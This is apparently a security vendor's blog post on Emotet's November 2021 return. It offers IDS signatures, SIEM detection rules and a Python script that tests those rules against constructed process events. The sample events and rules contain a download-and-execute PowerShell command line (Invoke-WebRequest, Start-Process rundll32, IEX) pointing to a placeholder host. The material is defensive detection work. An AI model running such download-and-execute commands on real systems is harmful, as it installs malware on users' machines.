Emotet is back

Emotet is one of the longest-lasting cybercrime services in existence, with its first banking Trojan identified in 2014. On January 27, 2021, a team of law enforcement agencies from around the world announced that they had seized and taken down the Emotet infrastructure and arrested an undisclosed number of operators as part of Operation LadyBird (https://perchsecurity.com/perch-news/ddos-crypto-and-ransomware-oh-my/). Emotet was one of the most heavily distributed malware families of 2020. It was primarily distributed via malicious spam with Word or Excel documents attached. Emotet operated as malware-as-a-service and was typically paired with other malware, such as Trickbot, and frequently resulted in ransomware attacks. Since the initial takedown, there had been no word of any Emotet activity until this week.

On Monday, November 15, word began leaking of a new version of Emotet being distributed. The initial sighting showed an Emotet DLL being downloaded by Trickbot, but since then multiple reports have come in of new malicious emails carrying Emotet attachments that spoof replies to stolen email chains, presumably sent from already infected hosts. The attachments observed so far have been Word *.DOCM, Excel *.XLSM, or Zip files. The newer version of Emotet is mostly the same as the older version; however, the new version encrypts C2 traffic via HTTPS instead of relying on unencrypted HTTP. So far, all of the newer Emotet C2 servers that have been identified have used a self-signed certificate with the same subject line, so the ConnectWise CRU has pushed out a new signature to all Perch customers that identifies outbound HTTPS traffic, on any network monitored by the Perch IDS, that attempts to connect to one of these new Emotet C2 servers:

alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"[ConnectWise CRU] Emotet (20211114) SSL/TLS Certificate M2";flow:established, to_client; tls.cert_subject; content:"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com"; reference:md5, bc3532085a0b4febd9eed51aac2180d0; classtype:trojan-activity; sid:900495; rev:1; metadata: created_at 2021_11_14, updated_at 2021_11_14;)

The CRU has managed to obtain a few samples of the new version of Emotet and has also identified a few log artifacts that indicate an Emotet infection. When a user opens an infected Word or Excel attachment, the embedded macros execute a PowerShell script through cmd.exe. This PowerShell script downloads the Emotet DLL, which is then executed with rundll32.exe. We have added two new signatures to the ConnectWise CRU collection in the Perch Marketplace to help identify this activity. We recommend that all Perch SIEM customers install the CRU collection and enable PowerShell script block logging for optimal visibility (https://docs.microsoft.com/en-us/powershell/scripting/windows-powershell/wmf/whats-new/script-logging?view=powershell-7.2). The two new Emotet signatures in the CRU collection are:

[CRU][Windows] Emotet (Operation Reacharound) Powershell Activity
	winlog.event_data.ParentImage:"cmd.exe" AND winlog.event_data.CommandLine:("Invoke-WebRequest -Uri" AND "Start-Process" AND "ArgumentList" AND "IEX")

[CRU][Windows] Emotet (Operation Reacharound) Rundll.exe Activity
	winlog.event_data.Image:"rundll32.exe" AND winlog.event_data.CommandLine:("AppData\Local\Temp Control_RunDLL")
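The following is an added example, not the CRU's own code, showing how the two SIEM rules above evaluate against process-creation events. It approximates the SIEM's phrase queries with tokenized, case-insensitive, in-order matching (an assumption; the real query engine's phrase semantics may be stricter), and the events, paths, and command lines are constructed sample data with a placeholder host, not real telemetry.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process events as a SIEM would index them under
# winlog.event_data. Sample data only; host names and paths are placeholders.
EVENTS: List[Dict[str, str]] = [
    {   # Stage 1: macro -> cmd.exe -> PowerShell downloader (constructed)
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": ("powershell -nop -w hidden -c \"Invoke-WebRequest -Uri "
                        "http://placeholder.invalid/x -OutFile $env:TEMP\\x.dll; "
                        "Start-Process rundll32 -ArgumentList ...; IEX $s\""),
    },
    {   # Stage 2: dropped DLL executed from %TEMP% via rundll32 (constructed)
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\abc.dll,Control_RunDLL",
    },
    {   # Benign download from cmd.exe sharing some tokens: must not alert
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c \"Invoke-WebRequest -Uri https://placeholder.invalid/r -OutFile r.csv\"",
    },
    {   # rundll32 opening a control panel applet, not from %TEMP%: must not alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    },
]

# The two CRU rules expressed as field -> required phrases (all must match).
RULES: Dict[str, Dict[str, List[str]]] = {
    "[CRU][Windows] Emotet (Operation Reacharound) Powershell Activity": {
        "ParentImage": ["cmd.exe"],
        "CommandLine": ["Invoke-WebRequest -Uri", "Start-Process", "ArgumentList", "IEX"],
    },
    "[CRU][Windows] Emotet (Operation Reacharound) Rundll.exe Activity": {
        "Image": ["rundll32.exe"],
        "CommandLine": [r"AppData\Local\Temp Control_RunDLL"],
    },
}

def tokens(text: str) -> List[str]:
    # Rough stand-in for a SIEM analyzer: lowercase, split on separators
    # (backslash, space, hyphen, comma, ...) while keeping dots in file names.
    return [t for t in re.split(r"[^\w.]+", text.lower()) if t]

def phrase_in(phrase: str, value: str) -> bool:
    # True when the phrase's tokens occur in order within the value's tokens.
    want, i = tokens(phrase), 0
    for tok in tokens(value):
        if i < len(want) and tok == want[i]:
            i += 1
    return i == len(want)

def matching_rules(event: Dict[str, str]) -> List[str]:
    # Names of every rule whose required phrases all hit this event.
    return [name for name, conds in RULES.items()
            if all(phrase_in(p, event.get(field, ""))
                   for field, phrases in conds.items() for p in phrases)]

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    # Map event index -> matching rule names, omitting events with no hits.
    return {i: hits for i, e in enumerate(events) if (hits := matching_rules(e))}

if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, hits)
```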

The email headers from the malicious emails we have observed include a distinctive MIME/Content-Type pattern that can also be used to identify malicious emails arriving at mail servers monitored by the Perch IDS. We have added the following signature for all Perch IDS customers to help identify this activity:

alert smtp $EXTERNAL_NET any -> $HOME_NET [25,587] (msg:"[ConnectWise CRU] Emotet (Operation Reacharound) Email MIME/Content-Type"; flow:to_server,established; content:"|0d 0a|MIME-Version|3a 20|1.0|0d 0a|Content-Type|3a 20|multipart/mixed|3b 20|boundary|3d 22 2d 2d|"; pcre:"/(\x2d\x2d\x3d_Part_|\x2d\x2d\x3d_NextPart_|\x3d\x3d_mimepart_)/R"; tag:session,5,packets; classtype:trojan-activity; sid:900496; rev:1; metadata: created_at 2021_11_16, updated_at 2021_11_16;)

As always, all the IDS signatures have automatically been added to all ConnectWise Perch IDS sensors, and the SIEM rules are available in the ConnectWise CRU collection in the Perch Marketplace. If you are subscribed to the ConnectWise CRU collection, all new content is automatically added to your environment. If you need any assistance enabling the ConnectWise CRU collection, please contact the ConnectWise SOC (https://www.connectwise.com/company/partner-services/support).